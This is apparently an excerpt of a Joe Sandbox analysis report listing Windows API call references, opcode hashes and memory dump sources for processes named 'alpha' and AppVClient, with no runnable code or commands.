                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 22757656-0
                                                                                                                                                                                                                          • Opcode ID: 3ec231d5a865b92c1f46db19410dcb0bde65a6f803de861b19db9b9b9fbe2bdc
                                                                                                                                                                                                                          • Instruction ID: 8a9f11fc5a8b1ad1ddba8919fa232819099e324bc9353f45ab89bb384ab01e77
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ec231d5a865b92c1f46db19410dcb0bde65a6f803de861b19db9b9b9fbe2bdc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94012675806210BFD7206BB89C4DB9E7BB9EB42734F614306F421E31E0DBB048858691
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,001B22F8), ref: 001B2514
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,?), ref: 001B251B
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,001B22F8), ref: 001B2539
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001B2540
                                                                                                                                                                                                                          Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 1c36ac9ff0f335e64d0e5d602bea845a9b86a5fe8eb920d04c704bc89b44e9ec
• Instruction ID: 07ada84e9fa8a1a84959a01d41520a34072b3a565b8dc5ce319deeed0d6ba035
• Opcode Fuzzy Hash: 1c36ac9ff0f335e64d0e5d602bea845a9b86a5fe8eb920d04c704bc89b44e9ec
• Instruction Fuzzy Hash: F9F06D72612211AFD724DFA1EC89BA6B7F8FF48312F50092EE141C6440E774E999CBA1
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0019885E), ref: 00198B9D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019885E), ref: 00198BA4
  • Part of subcall function 0019A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0019A9C5), ref: 0019A9D8
  • Part of subcall function 0019A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0019A9F3
  • Part of subcall function 0019A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0019A9FA
  • Part of subcall function 0019A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0019AA09
  • Part of subcall function 0019A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0019AA12
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,0019885E), ref: 001AB5B5
• RtlFreeHeap.NTDLL(00000000,?,0019885E), ref: 001AB5BC
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememcpy
• String ID:
• API String ID: 3480822025-0
• Opcode ID: 0af6937ecf8c1481d034429fb96daa274f3fc9dd9d57c90f9e88839d2c320b2f
• Instruction ID: 361359d721d6d0ea07f0e4bd4841fd127d33437eeaa27eecc1bdb19c4da59f51
• Opcode Fuzzy Hash: 0af6937ecf8c1481d034429fb96daa274f3fc9dd9d57c90f9e88839d2c320b2f
• Instruction Fuzzy Hash: 63E0487264B32167D620BBB47C0EB462B54AF45762F550412F685D91C0DF64C880C7A2
APIs
  • Part of subcall function 001A6F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 001A6F4F
• __set_app_type.MSVCRT ref: 001A6872
• __p__fmode.MSVCRT ref: 001A6888
• __p__commode.MSVCRT ref: 001A6896
• __setusermatherr.MSVCRT ref: 001A68B7
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: 736f72c4724c3b4c75ecb86d148e82ffc0d310d32b2e63ba69a7d12b48a880c7
• Instruction ID: 41b1a2b1617ed9542f2245c1212d6ee82ed179508cbb5610282dc1aa252d03c6
• Opcode Fuzzy Hash: 736f72c4724c3b4c75ecb86d148e82ffc0d310d32b2e63ba69a7d12b48a880c7
• Instruction Fuzzy Hash: 65F01C3810A300DFC728AF30FC4A5483BE1BB16321B140B1AF462C2AF1DB7994C0CB12
APIs
• _get_osfhandle.MSVCRT ref: 001B9F24
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,001B449C,?,?,00000001,?), ref: 001B9F2C
• _get_osfhandle.MSVCRT ref: 001B9F42
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001B449C,?,?,00000001,?), ref: 001B9F4A
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
• Opcode ID: 16da21608a40eebac0fda64e59f7e7a8c52dd3c30805f9d9a8e9d9e8a107db15
• Instruction ID: e0a032cfd20c1937e6c78babc0925730889fba42991e4d9ab28a85637bb9d9c3
• Opcode Fuzzy Hash: 16da21608a40eebac0fda64e59f7e7a8c52dd3c30805f9d9a8e9d9e8a107db15
• Instruction Fuzzy Hash: 3CE04F71502205FFDB00DBB0ED0EAEA7B6CEF04324F544506F525D64D1DBB5E9409621
APIs
• _get_osfhandle.MSVCRT ref: 0019824E
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00198256
• _get_osfhandle.MSVCRT ref: 00198264
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0019826C
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
• Opcode ID: ae3a610eff0a88ff9d4433902a89ec349ef11e38f753af6a04e10acd3afaf27c
• Instruction ID: d0c0d12c4a6fb22df71f3e697abc328740527e809f02da74a1d3ec0859f7d377
• Opcode Fuzzy Hash: ae3a610eff0a88ff9d4433902a89ec349ef11e38f753af6a04e10acd3afaf27c
• Instruction Fuzzy Hash: 8AE0B6B1902200EFDB04DBA0FD5EE963F64FB08311B40410AF205C2DB0EBB5E8808F12
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,0019729C), ref: 001972CF
• RtlFreeHeap.NTDLL(00000000), ref: 001972D6
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 001972DF
• RtlFreeHeap.NTDLL(00000000), ref: 001972E6
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 249a3cfeb0c60692be4ddcc1950a17e6c68a26240e5c73bb2d68b5dce0716b17
• Instruction ID: 2dc11430cf62fae46b62843a2ecafee2c6db177246e838e12910a79043f352c3
• Opcode Fuzzy Hash: 249a3cfeb0c60692be4ddcc1950a17e6c68a26240e5c73bb2d68b5dce0716b17
• Instruction Fuzzy Hash: 8CD0C932407120ABD7507FE0BC0DF863F28EF49313F410403F205824608AB448808B62
APIs
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
  • Part of subcall function 0019A62F: wcschr.MSVCRT ref: 0019A635
  • Part of subcall function 0019C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0019C5BD
  • Part of subcall function 0019C570: RtlFreeHeap.NTDLL(00000000), ref: 0019C5C4
  • Part of subcall function 0019C570: _setjmp3.MSVCRT ref: 0019C630
• _wcsupr.MSVCRT ref: 001AC21F
  • Part of subcall function 001A1A47: memset.MSVCRT ref: 001A1AE2
  • Part of subcall function 001A1A47: ??_V@YAXPAX@Z.MSVCRT(001A2229,?,001A2229,00000000,-00000105,?,00000000,00000000), ref: 001A1BA4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
• String ID: FOR$ IF
• API String ID: 3818062306-2924197646
• Opcode ID: 334d75aba30f8d4249ccd5a4e0911fb2f44a15d6ff21fb101b8424031f08523a
• Instruction ID: 5cb5e20c4ff76117e7a3a482047cd45695ddcf13ab59ef5ff27d49fe2f097569
• Opcode Fuzzy Hash: 334d75aba30f8d4249ccd5a4e0911fb2f44a15d6ff21fb101b8424031f08523a
• Instruction Fuzzy Hash: AE5118257002029ADF257BBCC89177B22E6EFA1754F59402AE906CB295FB66DD42C3C0
APIs
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• wcschr.MSVCRT ref: 001BBF88
• memcpy.MSVCRT(00000000,?,001B9E02,001BCD80,00000030,001B448F,?,?,?,00000001), ref: 001BC008
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcessmemcpywcschr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 3241892172-381716982
• Opcode ID: ca5ac65fc4853b231074935ddcf02fe76f04b14d66849a1d5a681e198d7ecdce
• Instruction ID: 5e08f1949f6daa215eb12927d4b38dc4166d80cb3f9be14518c26a5c3acd0934
• Opcode Fuzzy Hash: ca5ac65fc4853b231074935ddcf02fe76f04b14d66849a1d5a681e198d7ecdce
• Instruction Fuzzy Hash: 20614975E08215CBCF18DF68D890AFDBBF1FB58310B20452EE816E7A90D7B199418F94
APIs
• _wcsicmp.MSVCRT ref: 0019ABE3
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
  • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
  • Part of subcall function 0019CF10: _setjmp3.MSVCRT ref: 0019CF28
  • Part of subcall function 0019CF10: iswspace.MSVCRT ref: 0019CF6B
  • Part of subcall function 0019CF10: wcschr.MSVCRT ref: 0019CF8D
  • Part of subcall function 0019CF10: iswdigit.MSVCRT ref: 0019CFEE
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• longjmp.MSVCRT(001D0A30,00000001,00000000,00000000,00000002), ref: 001ACB58
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
• String ID: REM/?
• API String ID: 49548326-4093888634
• Opcode ID: ca60e496d30a9b073e85f9d730b22f69348a6e1b8c0d10f70b48dfd98afe1df5
• Instruction ID: 6ec48f46b50e90d9eab6fe3f074df2e504d748281e0ab9f11557c32c0cbe5b10
• Opcode Fuzzy Hash: ca60e496d30a9b073e85f9d730b22f69348a6e1b8c0d10f70b48dfd98afe1df5
• Instruction Fuzzy Hash: A331F3327553059BDF24EB78A842B2A73A6EF80750F94442FF502CB6D1EBB1CC448396
APIs
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,0019B11F), ref: 001ACB8B
• SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 001ACC2D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ConsoleTitle
• String ID: -
• API String ID: 3358957663-3695764949
• Opcode ID: 20dbd83617b55d72b2ffe99ae8a6f96bb7555e68647464a27d109a4dbe0c901d
• Instruction ID: b53eab3254895a79f69aa58b5dd17e6c77489bd28f0421deddccee0562991c25
• Opcode Fuzzy Hash: 20dbd83617b55d72b2ffe99ae8a6f96bb7555e68647464a27d109a4dbe0c901d
• Instruction Fuzzy Hash: 742147356002009BCF19AB6CD895BBE7BE2EF80710F58442DE8064B694DB759D86C6D1
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001B8AC9
• printf.MSVCRT ref: 001B8B24
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                                                                                                                                                                          • String ID: %3d
                                                                                                                                                                                                                          • API String ID: 2845598586-2138283368
                                                                                                                                                                                                                          • Opcode ID: 25d33db2bdac185f99e2896b1ad2a2e7c51f7939c344367cd6c05e7009b4bb43
                                                                                                                                                                                                                          • Instruction ID: e7d92ab6635e5ad2035bf4e07924ee14dbd4f62e6d018c9ef7552375168ff053
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25d33db2bdac185f99e2896b1ad2a2e7c51f7939c344367cd6c05e7009b4bb43
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB012871610204BBEB21AFA58C86FEB3AADDB95BA0F044015FB08A60C1D7B1DD90C671
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: iswspacewcschr
                                                                                                                                                                                                                          • String ID: =,;
                                                                                                                                                                                                                          • API String ID: 287713880-1539845467
                                                                                                                                                                                                                          • Opcode ID: 19504e291b49b1178d133b898c054606fdc80d824fd5758e53d0f7587b004408
                                                                                                                                                                                                                          • Instruction ID: 3e55bb6beb0bce16feae953feddfbd2c5390fa62c3d7f7486288757d3654cf60
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19504e291b49b1178d133b898c054606fdc80d824fd5758e53d0f7587b004408
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE04F33A06522AA8E34465DBC28977B3DB9FD7B6239A001BF806A3554E7608C4881D3

Execution Graph

Execution Coverage: 4%
Dynamic/Decrypted Code Coverage: 98%
Signature Coverage: 0%
Total number of Nodes: 98
Total number of Limit Nodes: 10

Control-flow Graph
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 00B853C4
Memory Dump Source
• Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: bfbcfa76e8cd4bbe5457652ae9c580235a8a8ce69690a9e437a6f1ca008cc0cd
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: D74106A240DE958FD736762448A43B07BE0EB123E2F9D00E7D4C38B1F6E5984C81D72A

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction ID: 208b6515a2ace54b791424190b98d35bc04cf792c69bee95e999594717fa5d46
• Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction Fuzzy Hash: A4D1263142CB0D8BCB28FF58C8857EAB7E1FBA6310F58469EE446C3164DA74DA4586C2

Control-flow Graph
Memory Dump Source
• Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
• Instruction ID: 9b64a698bc1afda0ce909035c23014b861c11e819293cc7255fc46a409a50714
• Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
• Instruction Fuzzy Hash: 6061333060CA469FC7A5BF2898987367BE0FB59350FE802DAE446D31B1DF249C45D392

APIs
Memory Dump Source
• Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction ID: c4a8d9904ae8342a1423063b10073a91ee0fb095379de8fced6a8bee046ecf7e
• Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction Fuzzy Hash: 6901D67451DE84CFD67BBB1844C52B966D2F758320F2845D6D08AC70B2C9344D00D742

APIs
Memory Dump Source
• Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: a972257ab814c39894ddf35c994b17c9b0e67f4e9668196cfe58b32487f78c4c
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: B4C08C7412C802A7527A36482C4F0B52AD0C60E350BCC00C68C02A0230DD288E03C397